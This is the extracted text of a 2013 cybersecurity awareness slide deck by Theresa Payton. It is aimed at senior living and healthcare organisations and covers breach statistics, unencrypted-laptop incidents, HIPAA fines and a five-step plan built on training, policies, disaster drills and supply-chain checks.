Video | What Happened •  Directions to the A/V team - Please play from the

beginning and cut it at 1:25…..

•  Video – http://www.youtube.com/watch?v=3FelJwb4NCM

Theresa  Payton  ©  2013  All  Rights  Reserved    

Uber Connected?| What to Watch? 6 Billion people

have mobile phones

The number of networked devices = the globe’s population

Internet connectivity ubiquitous!

Uber Connected?| What to Watch? 1 Minute just went by…what happened? 639,800

GB was transferred…

135  Botnet  Infec>ons  

1,300  new  mobile  users  

Intel:    What  Happens  in  an  Internet  Minute?    Posted  By  Krystal  Temple  March  13,  2012.  

204  million  emails  sent  

20  New  vic>ms  of  iden>ty  theF  

100+  LinkedIn  accounts    added  

20  million  photo    views  30  hours  of  video    uploaded  (+1.3M  views)  

   

100,000  new  tweets  277,000  Facebook  logins  

Memory Check| Current State of Affairs

What were you doing 243 days ago?

Current State of Affairs| Incoming!

Something is discovered every 90 seconds.

What is it?

Breach Discovery| Bold New Approach Needed

M-­‐Trends  2013,  Mandiant  

37%  

63%  

  Booming Economy? Where? Russia’s Cyber Crime…but it’s other places too.

  Latest estimated value of the country's cyber crime market is now $2.3 billion   almost double from the prior

year’s $1.2B

Current State of Affairs

9  

  $1.8 billion of that is from what?   You guessed it…Online fraud via banking malware,

phishing, and spam

Source: State and Trends of the Russian Digital Crime Market Released April 2012

Current State of Affairs| Assumptions

For IT risk and security, staffing levels should be between 5% and 12% of your total staff but many organizations have < 3%.  

Chris  Byrne,  Gartner  Security  and  Risk  Summit,  2012  

Current State of Affairs| Industry Challenges

What  Keeps  Me  Up  At  Night?    Businesses  in  a  recent  survey  indicated:  

 50%+  :    $/time  not  justified  by  the  threat.  

 75%  :    less  than  3  hours  per  year  and  almost  half  offer  zero    

 47%  -­‐    Recovery  Plans  are  Dilbert  Style!  

 6  out  of  10  –  go  ahead  and  talk  to  strangers  (unsecured  WiFi)  National  Cyber  Security  Alliance  and  Visa  poll:    business’  cyber  security  practices  &  attitudes  

Black Swan | Risk Management Convincing others to prepare to invest in an event that will “never” happen

•  “Zero Risk” does not exist but “Managed Risk” does •  Making security the business enabler vs. productivity roadblock

Black Swan | Risk Management “Senior living providers are

at particular risk because of the nature of the information they store on residents”

John Atkinson, Managing Partner at The

Willis Group Holdings

Black Swan | Risk Management “Over the weekend of November 17-18,

2012, five laptops were stolen from Riderwood’s physical therapy offices.”

On the hard drive? Unencrypted patient names, visits, addresses and policy numbers Lessons Learned: Data storage on hard drives Encrypting files

Black Swan | Risk Management

HHS  reason  for  heFy  fine?  Unencrypted  data,  did  not  do  regular  risk  assessments  

January 2013 “…the Hospice of North Idaho became HHS’s first facility with fewer

than 500 residents to be fined for a patient information data breach, saddling the hospice a whopping $50,000 bill.”

Stolen? Laptop (in 2010) Lessons Learned: Data storage on hard drives Delete files you do not need anymore Schedule periodic risk assessments Encrypting files

Black Swan | Risk Management HITECH Act requirement Organizations that have personal

health information (PHI) must have a plan of action in the event they did experience a security breach

And…Regulated by HIPAA? Breach reports to multiple outlets: Department of Health and Human Services

the media affected individuals.

Does Spending=Secure?| Invalid Assumptions

Case  Study:  Target  Corp.  and  Oracle  Corp.  

Hacking  contest  for  large  companies  

Target  spends  about  1/2  as  much  on  security  annually  as  Oracle  

Results?    

Target  was  more  difficult  to  hack  

Yurcan, Bryan. Panel Discussion: The Role of the Bank CIO. Bank Systems & Technology: October 20, 2011 Kapner, Suzanne. Hackers Press the ‘Schmooze’ Button. WSJ: October 31, 2011

Current State of Affairs| Innovation

How A Happy Meal = Better Security!

A case study in innovation.

5 Tech Trends | Enormous Implications

 BYOD –without CYA creates BYOB  The new 4 letter word is SMIT  Who knew cybercriminals were so

“socially minded”?  Malware morphs beyond

detection awareness  Why the Cloud could be your

“Father’s Oldsmobile” and when will we get Big Data analytics ?

BYOD

SMIT

SO SOCIAL!

MORPH TO THE MAX PO

RSC

HE

WR

APPER

DAT

A M

APS

DIGITAL ASSETS

Top Digital Assets?| Actions

Security and Privacy Settings

BYOD access…hmmm

Cloud?

Free Wi-Fi at Your Peril

What protections do you have for the “POTUS and VP” assets?

Plan of Attack| 5 Step Plan

Training  

Policies  and  Procedures  

Prac4cing  Digital  Doomsday  

Technology  Tuning  

Security  in  the  Supply  Chain  

 

80/20 Rule| 2 Steps = Biggest Impact

Best Practices & Improved Security Policies

Informed, Aware & Engaged Employees

Technology Improvements

Gov’t Regulation & Law Enforcement

58% 20% 18% 4%

2012  Bit9  Cyber  Security  Research  Report  

Back at the Office| Actions Basics Top Digital Assets – Who are they? Training Policies and Procedures Patches Configurations Hardening Encryption of PHI emails Encryption of data

Back at the Office| Actions

Password  protect  

Never  loan  devices  or  WiFi  

Treat  old  devices  and  back  up  informa>on  like  gold  

Timeout  feature  

4  TIPS  TO  REMEMBER  

Back at the Office| Actions Next Phase Incident Management Disaster Recovery Digital Disaster Technology Tuning Supply Chain Review

Back at the Office| Actions

• Check the box! DANGER! Trap: Focusing on

regulatory compliance instead of comprehensive

security.

• Looks good but is it safe? A lack of security features

consistently built into elderly care and health care

systems.

• 411 Breakdown: Capability gap for sharing

information on cybersecurity and other issues.

• No Measurements: Lack of metrics for evaluating

cybersecurity.

Next Steps | Let’s Get to Work!

5 Things… •  Training – just say NO to CBT only •  Document IT AND End User policies and procedures •  Where will your team get stuck during the digital

doomsday exercise? •  90% of our clients last year had the core technology they

needed but… •  You are the weakest link? No!

Next Steps | Practice Makes Perfect Here’s your next staff meeting agenda Current State Assessment – Spend Dedicated Time Discussing: What security measures are in place? What do they protect? How vulnerable are you? How vulnerable are your clients? What client communication and response plans exist? Do you test incident management plans using plausible scenarios? Options Analysis What could be done within the next 90 days to improve security? How would your company respond to losing intellectual property,

internal emails posted on a public website, or worse? How can each security layer be enhanced, at what cost and at what

impact to productivity?

Next Steps | Practice Makes Perfect

Staff Meeting - Practice the Disaster Name Your Worst Digital Nightmare: Digital death, what happened? Go around the room and ask the team to tell you the

escalation plan and their list of actions. Do you know who to call? Do you know what to do? How do you stop the bad guys from taking more? Do you need outside help? Time yourself…how long does it take before you create a

plan of action?

Next Steps | Practice Makes Perfect

Supply Chain Security – 8 Vendor Checkpoints Information Security Identity Management Endpoint and Server Security Gateway and Network Security Web and Application Security Physical and Personnel Security Security Management Intellectual Property, Customer Information, and Financial

Transaction Security

Next Steps | Practice Makes Perfect

Supply Chain Security –Vendor Must Answer: Chain of Custody Least Privilege Access Separation of Duties Tamper Resistance and Evidence Persistent Compliance Management Code Testing and Verification Trusted and Vetted Staff

Next Steps | Cloud in your future?

Draw up the Pre-Nup First! When you “break up” what are their sanitization policies so

you get your data back and they don’t have your digital footprints?

Need a “Go to guide”? Try NIST: NIST Cloud Computing Reference Architecture SP 500-292

Questions?                tp@fortalicesolutions.com  

 @FortaliceLLC  

 Fortalice-­‐LLC  

 fortalicesolutions.blogspot.com